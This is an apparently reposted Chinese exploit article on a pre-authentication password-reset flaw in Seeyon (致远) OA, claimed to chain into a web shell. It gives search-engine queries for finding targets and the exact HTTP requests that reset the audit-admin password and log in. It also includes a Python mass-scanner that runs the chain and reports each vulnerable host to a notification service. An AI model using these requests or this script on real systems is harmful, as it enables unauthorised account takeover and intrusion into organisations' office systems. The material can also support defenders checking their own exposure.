一、漏洞描述

致远OA存在前台密码重置漏洞，可以重置系统中默认账户，使用重置后的密码通过接口获取cookie后可getshell，此组合拳可以实现致远的前台RCE。

二、信息收集

hunter:app.name="致远 OA"fofa：app="致远A8"

收集资产

三、漏洞复现

重置审计管理员密码

seeyon-guest -696400025239268-----忽略
system -72730320132347481---忽略
audit-admin -440160666363------忽略
group-admin 5725175934914479521

第一步，我们需要发送一个PUT请求包，来验证漏洞的存在性

PUT /seeyon/rest/orgMember/-4401606663639775639/password/share.do HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: JSESSIONID=3891CB3E3CA435C599001E4F03A335B0; loginPageURL=

如果回200OK，和截图的样子，就说明成功了一半

接着，我们继续发POST请求，来验证

POST /seeyon/rest/authentication/ucpcLogin?login_username=audit-admin&login_password=share.do&ticket= HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Content-Type: application/x-www-form-urlencoded

这个时候你已经登录OK了，

获取当前用户信息，确认cookie有效性

POST /seeyon/rest/m3/login/getCurrentUser HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: */*
Cookie: JSESSIONID=66413CAC627CF5AE8DE839AB47E82B4D;
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Content-Type: application/json;charset=UTF-8

{"":""}

出现这个表示成功

使用重置后的密码登录

audit-admin/share.do

四、重要python代码

#致远OA ucpcLogin存在密码重置漏洞
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from requests.exceptions import Timeout
import os
import urllib.parse
import urllib.request
import re

def sc_send(text, desp='', key='[SENDKEY]'):
    postdata = urllib.parse.urlencode({'text': text, 'desp': desp}).encode('utf-8')
    urlserver = f'https://sctapi.ftqq.com/{key}.send'
    req = urllib.request.Request(urlserver, data=postdata, method='POST')
    with urllib.request.urlopen(req) as response:
        result = response.read().decode('utf-8')
    return result
key = "SCT202695TeKe1ATgRMke7f7jyrOOkH9GX"

def scan_Zhiyuan_OA_pwd_reset_vul(url, proxies, headers, append_to_output):

    proxies = {
        'http': 'http://127.0.0.1:8080',
        'https': 'http://127.0.0.1:8080'
    }

    if not url.startswith('http://') and not url.startswith('https://'):
        url = 'http://' + url

    headers_put = {
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0',
        'Accept': '*/*',
        'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
        'Accept-Encoding': 'gzip, deflate, br',
        'Connection': 'close',
        'Cookie': 'JSESSIONID=3891CB3E3CA435C599001E4F03A335B0; loginPageURL='
    }

    headers_post = {
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0',
        'Accept': '*/*',
        'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
        'Accept-Encoding': 'gzip, deflate, br',
        'Connection': 'close',
        'Content-Type': 'application/x-www-form-urlencoded'
    }

    # 定义请求体数据
    data_post = {
        'login_username': 'audit-admin',
        'login_password': 'share.do',
        'ticket': ''
    }

    data = '''{"":""}'''
    append_to_output("===================================================================", "green")
    append_to_output(f"扫描目标: {url}", "yellow")
    try:
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
        # 发送PUT请求
        put_response = requests.put(f"{url}/seeyon/rest/orgMember/-4401606663639775639/password/share.do",headers=headers_put,verify=False, timeout=5, proxies=proxies)

        # 发送POST请求
        post_response = requests.post(f"{url}/seeyon/rest/authentication/ucpcLogin", headers=headers_post,data=data_post,verify=False, timeout=5, proxies=proxies)

        post_response_cookie = requests.post(f"{url}/seeyon/rest/m3/login/getCurrentUser", headers=headers_post,data=data, verify=False, timeout=5, proxies=proxies)
        # 检查PUT请求响应

        if put_response.status_code == 200:
            append_to_output(f"[+] {url} PUT请求成功并且响应包含！！！！", "yellow")
            if post_response.status_code == 200 and 'ok' in post_response.text and 'audit-admin' in post_response.text:
                append_to_output(f"[+] {url} 存在致远OA ucpcLogin存在密码重置漏洞,需要拿COOKIE！！！！", "yellow")
                if post_response_cookie.status_code == 200 and 'audit-admin' in post_response.text:
                    append_to_output(f"[+] {url} 存在致远OA ucpcLogin存在密码重置漏洞！！！！", "red")
                    ret = sc_send('致远OA ucpcLogin存在密码重置漏洞', f"漏洞连接: {url}rn漏洞类型: 文件上传", key)
                else:
                    append_to_output(f"[-] {url} 不存在致远OA ucpcLogin存在密码重置漏洞", "green")
            else:
                append_to_output(f"[-] {url} 不存在致远OA ucpcLogin存在密码重置漏洞", "green")
        else:
            append_to_output(f"[-] {url} 不存在PUT请求成功并且响应包含", "green")
    except Timeout:
        append_to_output(f"[!] 请求超时，跳过URL: {url}", "yellow")
    except Exception as e:
        if 'HTTPSConnectionPool' in str(e) or 'Burp Suite Professional' in str(e):
            append_to_output(f"[-] {url} 证书校验错误或者证书被拒绝", "yellow")
        else:
            append_to_output(str(e), "yellow")

 

原文始发于微信公众号（暗影网安实验室）：致远OA ucpcLogin密码重置（可组合拳GetShell）